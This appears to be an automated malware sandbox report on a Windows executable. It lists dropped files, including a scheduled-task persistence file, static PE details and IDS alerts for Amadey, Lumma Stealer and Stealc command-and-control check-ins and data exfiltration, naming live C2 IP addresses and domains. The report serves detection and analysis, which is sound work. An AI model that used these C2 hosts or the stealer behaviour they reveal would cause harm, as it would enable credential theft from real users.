Entropy (8bit):	5.509351449795665
Encrypted:	false
SSDEEP:	192:nnPOeRnHYbBp6oJ0aX+H6SEXK5kHWNBw8d4Sl:PPeBJUapHEwX0
MD5:	CDA68F1A0739F1C5ED942F5329CEECB8
SHA1:	A50F7ACE722965C20F0FF0A2322E107B8DA4A722
SHA-256:	DDDB0340FDC2B4BC8ED63695EF583E6CF125584BDFC12875BBDDBD5F0C5BD4F4
SHA-512:	E2E44DF8E987F0EE5E8EA59D4FE718F4E57D36BA50997AC7C69328AD07F67235E7695F9F53307795B9A4AF2EF0EB0F3FAF371D3312615532B1AF0D5DFDEB9551
Malicious:	false
Preview:	// Mozilla User Preferences....// DO NOT EDIT THIS FILE...//..// If you make changes to this file while the application is running,..// the changes will be overwritten when the application exits...//..// To change a preference value, you can either:..// - modify it via the UI (e.g. via about:config in the browser); or..// - set it within a user.js file in your profile.....user_pref("app.normandy.first_run", false);..user_pref("app.normandy.migrationsApplied", 12);..user_pref("app.normandy.user_id", "9e34c6e7-cbed-40a0-ba63-35488e171013");..user_pref("app.update.auto.migrated", true);..user_pref("app.update.background.rolledout", true);..user_pref("app.update.lastUpdateTime.browser-cleanup-thumbnails", 0);..user_pref("app.update.lastUpdateTime.recipe-client-addon-run", 1696426836);..user_pref("app.update.lastUpdateTime.region-update-timer", 0);..user_pref("app.update.lastUpdateTime.rs-experiment-loader-timer", 1696426837);..user_pref("app.update.lastUpdateTime.xpi-signature-verification

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.json (copy)

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\sessionCheckpoints.json.tmp

Download File

Process:	C:\Program Files\Mozilla Firefox\firefox.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	90
Entropy (8bit):	4.194538242412464
Encrypted:	false
SSDEEP:	3:YVXKQJAyiVLQwJtJDBA+AJ2LKZXJ3YFwHY:Y9KQOy6Lb1BA+m2L69Yr
MD5:	C4AB2EE59CA41B6D6A6EA911F35BDC00
SHA1:	5942CD6505FC8A9DABA403B082067E1CDEFDFBC4
SHA-256:	00AD9799527C3FD21F3A85012565EAE817490F3E0D417413BF9567BB5909F6A2
SHA-512:	71EA16900479E6AF161E0AAD08C8D1E9DED5868A8D848E7647272F3002E2F2013E16382B677ABE3C6F17792A26293B9E27EC78E16F00BD24BA3D21072BD1CAE2
Malicious:	false
Preview:	{"profile-after-change":true,"final-ui-startup":true,"sessionstore-windows-restored":true}

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	290
Entropy (8bit):	3.395432340814666
Encrypted:	false
SSDEEP:	6:wX55ZsUEZ+lX1CGdKUe6tFXqYEp5t/uy0lBhlydt0:auQ1CGAFifXVBzydt0
MD5:	8A1575C2EA53F8954E8508ACA051BBFC
SHA1:	EB697EBB943D3830A1DCE08B4C9E6FDE82CAD999
SHA-256:	F3847E245597AACBAE05F7EAC3944CFB2AE62DD8A1519BC657A354C7ED79EDF4
SHA-512:	ECC1B476A7DA57767386E4851D51190BDF82F94CC7BFC27E846C5372C7391D3E8529EC23875B247DD58BA75417218513DE58961758501A0BE086F94EB3FB9E13
Malicious:	false
Preview:	.....O.....A.9MF.)\|iF.......<... .....s.......... ....................9.C.:.\.U.s.e.r.s.\.a.l.f.o.n.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........A.L.F.O.N.S.-.P.C.\.a.l.f.o.n.s...................0................. .@3P.........................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.42159324555183
Encrypted:	false
SSDEEP:	6144:aSvfpi6ceLP/9skLmb0OTZWSPHaJG8nAgeMZMMhA2fX4WABlEnNi0uhiTw:JvloTZW+EZMM6DFys03w
MD5:	AB99903B05DD0923197BCC196F6FC8BA
SHA1:	5F58FD4959BFF0F909FB273A19D718049295D733
SHA-256:	767F7A6E31DCD7F80D4A6FB4E3D0FD693AEA6B291F3FB67B6B000FFB8B4ADA09
SHA-512:	DF216F3535850B76A9FF0F3F2D8B3097636B97A78EF1B340F8421E7A1CE0A8C15D95F28A67391E872BB6B3D639B6899D2FF82AE52282F6F6A80D54A7D18369F6
Malicious:	false
Preview:	regf>...>....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtmB..!................................................................................................................................................................................................................................................................................................................................................3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.640509311277329
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'288'064 bytes
MD5:	4316e6bfa31a0f5639ab60ad32c2f672
SHA1:	cc0a14bd5b282fa1963c11fb3a0cbf576f463357
SHA256:	28c789c3953a7383ef6d9876e2aaf5bb91393b0be4b8c8919845a2428920e751
SHA512:	1b2f69c509fc5b02494b465eab37aa2fa41bd738ba9cf4b19cdd562fd16ea10c58bbca56e2c7ffa8dc2052235b8ee6670bf8e1578faa2f1892be9f51466014fb
SSDEEP:	49152:9zWk+4IL6xZvHO5SzmD0nM67fmWo1v66/jBNcPExS179sTnuPJ:JW74ZxZvHO5SW0nM67f9gvTjBoKmQYJ
TLSH:	B4E54A93B44E61CFD44E12B4592BCE46686E4BF9DB3006C39D586CBA7D62CC322F5C29
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	00928e8e8686b000

Static PE Info

General

Entrypoint:	0x723000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F6204836BCAh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x1e0	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x321f28	0x10	fknmyouv
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x321ed8	0x18	fknmyouv
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x68000	44bf8f2a70fab40b0a741666f7e3eb10	False	0.5656057504507211	data	7.114782188410658	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x1e0	0x200	b7d16686b376821266a9345c26b7e6d6	False	0.53125	data	4.7176788329467545	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
fknmyouv	0x6b000	0x2b7000	0x2b7000	e81262a109f7c8588f9e3fdda1c7a9fa	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
oavxjruv	0x322000	0x1000	0x600	d4d77aa7bb1f3fc5116718fef4251411	False	0.6028645833333334	data	5.157602407946364	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.taggant	0x323000	0x3000	0x2200	a188b463d9ba56881569b19c023a14b3	False	0.05824908088235294	DOS executable (COM)	0.6969969837334871	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_MANIFEST	0x69060	0x17d	XML 1.0 document, ASCII text, with CRLF line terminators	English	United States	0.5931758530183727

Imports

DLL	Import
kernel32.dll	lstrcpy

Possible Origin

Language of compilation system	Country where language is spoken	Map
English	United States

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2024-11-04T17:31:30.367177+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	49758	TCP
2024-11-04T17:32:03.984121+0100	2856147	ETPRO MALWARE Amadey CnC Activity M3	1	192.168.2.5	49925	185.215.113.43	80	TCP
2024-11-04T17:32:07.341243+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49946	31.41.244.11	80	TCP
2024-11-04T17:32:08.603031+0100	2022930	ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow	1	4.245.163.56	443	192.168.2.5	49948	TCP
2024-11-04T17:32:13.932142+0100	2856122	ETPRO MALWARE Amadey CnC Response M1	1	185.215.113.43	80	192.168.2.5	49940	TCP
2024-11-04T17:32:14.843874+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	49984	185.215.113.43	80	TCP
2024-11-04T17:32:15.769829+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	49990	185.215.113.16	80	TCP
2024-11-04T17:32:23.022241+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	63001	1.1.1.1	53	UDP
2024-11-04T17:32:23.050118+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	64380	1.1.1.1	53	UDP
2024-11-04T17:32:23.076923+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	64374	1.1.1.1	53	UDP
2024-11-04T17:32:23.104876+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	62631	1.1.1.1	53	UDP
2024-11-04T17:32:23.132904+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	57689	1.1.1.1	53	UDP
2024-11-04T17:32:23.160250+0100	2057121	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (founpiuer .store)	1	192.168.2.5	61824	1.1.1.1	53	UDP
2024-11-04T17:32:23.867133+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	49999	104.21.5.155	443	TCP
2024-11-04T17:32:23.867133+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	49999	104.21.5.155	443	TCP
2024-11-04T17:32:24.625845+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	49999	104.21.5.155	443	TCP
2024-11-04T17:32:24.625845+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	49999	104.21.5.155	443	TCP
2024-11-04T17:32:25.034905+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50000	185.215.113.43	80	TCP
2024-11-04T17:32:25.323777+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50001	104.21.5.155	443	TCP
2024-11-04T17:32:25.323777+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50001	104.21.5.155	443	TCP
2024-11-04T17:32:25.852464+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50001	104.21.5.155	443	TCP
2024-11-04T17:32:25.852464+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50001	104.21.5.155	443	TCP
2024-11-04T17:32:25.963115+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50002	185.215.113.16	80	TCP
2024-11-04T17:32:26.316261+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50003	188.114.97.3	443	TCP
2024-11-04T17:32:27.473167+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50003	188.114.97.3	443	TCP
2024-11-04T17:32:27.473167+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50003	188.114.97.3	443	TCP
2024-11-04T17:32:27.863212+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50005	104.21.5.155	443	TCP
2024-11-04T17:32:27.863212+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50005	104.21.5.155	443	TCP
2024-11-04T17:32:28.275036+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50005	104.21.5.155	443	TCP
2024-11-04T17:32:28.303599+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50006	188.114.97.3	443	TCP
2024-11-04T17:32:29.350389+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50006	188.114.97.3	443	TCP
2024-11-04T17:32:29.350389+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50006	188.114.97.3	443	TCP
2024-11-04T17:32:29.353174+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50007	104.21.5.155	443	TCP
2024-11-04T17:32:29.353174+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50007	104.21.5.155	443	TCP
2024-11-04T17:32:30.424302+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50009	188.114.97.3	443	TCP
2024-11-04T17:32:31.135331+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50011	104.21.5.155	443	TCP
2024-11-04T17:32:31.135331+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50011	104.21.5.155	443	TCP
2024-11-04T17:32:31.224146+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50009	188.114.97.3	443	TCP
2024-11-04T17:32:32.372228+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50012	188.114.97.3	443	TCP
2024-11-04T17:32:33.488349+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50013	104.21.5.155	443	TCP
2024-11-04T17:32:33.488349+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50013	104.21.5.155	443	TCP
2024-11-04T17:32:33.841357+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50014	185.215.113.43	80	TCP
2024-11-04T17:32:33.865384+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50015	188.114.97.3	443	TCP
2024-11-04T17:32:34.763112+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50016	185.215.113.16	80	TCP
2024-11-04T17:32:35.392993+0100	2044243	ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in	1	192.168.2.5	50017	185.215.113.206	80	TCP
2024-11-04T17:32:35.683968+0100	2044244	ET MALWARE Win32/Stealc Requesting browsers Config from C2	1	192.168.2.5	50017	185.215.113.206	80	TCP
2024-11-04T17:32:35.732607+0100	2044245	ET MALWARE Win32/Stealc Active C2 Responding with browsers Config	1	185.215.113.206	80	192.168.2.5	50017	TCP
2024-11-04T17:32:36.011799+0100	2044246	ET MALWARE Win32/Stealc Requesting plugins Config from C2	1	192.168.2.5	50017	185.215.113.206	80	TCP
2024-11-04T17:32:36.018640+0100	2044247	ET MALWARE Win32/Stealc/Vidar Stealer Active C2 Responding with plugins Config	1	185.215.113.206	80	192.168.2.5	50017	TCP
2024-11-04T17:32:36.605710+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	63506	1.1.1.1	53	UDP
2024-11-04T17:32:37.643440+0100	2044248	ET MALWARE Win32/Stealc Submitting System Information to C2	1	192.168.2.5	50017	185.215.113.206	80	TCP
2024-11-04T17:32:37.645962+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50018	104.21.5.155	443	TCP
2024-11-04T17:32:37.645962+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50018	104.21.5.155	443	TCP
2024-11-04T17:32:37.648015+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50019	188.114.97.3	443	TCP
2024-11-04T17:32:38.059156+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	50804	1.1.1.1	53	UDP
2024-11-04T17:32:38.093671+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	53665	1.1.1.1	53	UDP
2024-11-04T17:32:38.170491+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	57960	1.1.1.1	53	UDP
2024-11-04T17:32:38.197386+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	59511	1.1.1.1	53	UDP
2024-11-04T17:32:38.573360+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50017	185.215.113.206	80	TCP
2024-11-04T17:32:38.869653+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50020	104.21.5.155	443	TCP
2024-11-04T17:32:38.869653+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50020	104.21.5.155	443	TCP
2024-11-04T17:32:39.615284+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50021	188.114.97.3	443	TCP
2024-11-04T17:32:39.643019+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50020	104.21.5.155	443	TCP
2024-11-04T17:32:39.643019+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50020	104.21.5.155	443	TCP
2024-11-04T17:32:40.364390+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50022	104.21.5.155	443	TCP
2024-11-04T17:32:40.364390+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50022	104.21.5.155	443	TCP
2024-11-04T17:32:40.674350+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50023	104.21.5.155	443	TCP
2024-11-04T17:32:40.674350+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50023	104.21.5.155	443	TCP
2024-11-04T17:32:40.869605+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50022	104.21.5.155	443	TCP
2024-11-04T17:32:40.869605+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50022	104.21.5.155	443	TCP
2024-11-04T17:32:41.234035+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50023	104.21.5.155	443	TCP
2024-11-04T17:32:41.242156+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50024	185.215.113.43	80	TCP
2024-11-04T17:32:41.960518+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50027	104.21.5.155	443	TCP
2024-11-04T17:32:41.960518+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50027	104.21.5.155	443	TCP
2024-11-04T17:32:42.214629+0100	2803305	ETPRO MALWARE Common Downloader Header Pattern H	3	192.168.2.5	50026	185.215.113.16	80	TCP
2024-11-04T17:32:43.755020+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50032	104.21.5.155	443	TCP
2024-11-04T17:32:43.755020+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50032	104.21.5.155	443	TCP
2024-11-04T17:32:44.877591+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50033	188.114.97.3	443	TCP
2024-11-04T17:32:45.655273+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50033	188.114.97.3	443	TCP
2024-11-04T17:32:46.309370+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50041	104.21.5.155	443	TCP
2024-11-04T17:32:46.309370+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50041	104.21.5.155	443	TCP
2024-11-04T17:32:52.538411+0100	2044696	ET MALWARE Win32/Amadey Host Fingerprint Exfil (POST) M2	1	192.168.2.5	50060	185.215.113.43	80	TCP
2024-11-04T17:32:52.621206+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50063	104.21.5.155	443	TCP
2024-11-04T17:32:52.621206+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50063	104.21.5.155	443	TCP
2024-11-04T17:32:56.691691+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50073	104.21.5.155	443	TCP
2024-11-04T17:32:56.691691+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50073	104.21.5.155	443	TCP
2024-11-04T17:33:02.253541+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50092	104.21.5.155	443	TCP
2024-11-04T17:33:02.253541+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50092	104.21.5.155	443	TCP
2024-11-04T17:33:03.095654+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50092	104.21.5.155	443	TCP
2024-11-04T17:33:07.038102+0100	2057131	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (presticitpo .store)	1	192.168.2.5	51563	1.1.1.1	53	UDP
2024-11-04T17:33:07.075273+0100	2057129	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (crisiwarny .store)	1	192.168.2.5	64907	1.1.1.1	53	UDP
2024-11-04T17:33:07.103509+0100	2057127	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (fadehairucw .store)	1	192.168.2.5	63414	1.1.1.1	53	UDP
2024-11-04T17:33:07.133321+0100	2057125	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (thumbystriw .store)	1	192.168.2.5	52578	1.1.1.1	53	UDP
2024-11-04T17:33:07.158535+0100	2057123	ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (necklacedmny .store)	1	192.168.2.5	63675	1.1.1.1	53	UDP
2024-11-04T17:33:07.862761+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50129	104.21.5.155	443	TCP
2024-11-04T17:33:07.862761+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50129	104.21.5.155	443	TCP
2024-11-04T17:33:08.559240+0100	2049836	ET MALWARE Lumma Stealer Related Activity	1	192.168.2.5	50129	104.21.5.155	443	TCP
2024-11-04T17:33:08.559240+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50129	104.21.5.155	443	TCP
2024-11-04T17:33:08.854884+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:09.574554+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50132	104.21.5.155	443	TCP
2024-11-04T17:33:09.574554+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50132	104.21.5.155	443	TCP
2024-11-04T17:33:10.311647+0100	2049812	ET MALWARE Lumma Stealer Related Activity M2	1	192.168.2.5	50132	104.21.5.155	443	TCP
2024-11-04T17:33:10.311647+0100	2054653	ET MALWARE Lumma Stealer CnC Host Checkin	1	192.168.2.5	50132	104.21.5.155	443	TCP
2024-11-04T17:33:12.385771+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:14.165020+0100	2057122	ET MALWARE Observed Win32/Lumma Stealer Related Domain (founpiuer .store in TLS SNI)	1	192.168.2.5	50161	104.21.5.155	443	TCP
2024-11-04T17:33:14.165020+0100	2028371	ET JA3 Hash - Possible Malware - Fake Firefox Font Update	3	192.168.2.5	50161	104.21.5.155	443	TCP
2024-11-04T17:33:14.555318+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:14.764745+0100	2048094	ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration	1	192.168.2.5	50161	104.21.5.155	443	TCP
2024-11-04T17:33:16.577142+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:18.700860+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:19.192476+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50110	185.215.113.206	80	TCP
2024-11-04T17:33:24.775248+0100	2803304	ETPRO MALWARE Common Downloader Header Pattern HCa	3	192.168.2.5	50170	185.215.113.16	80	TCP
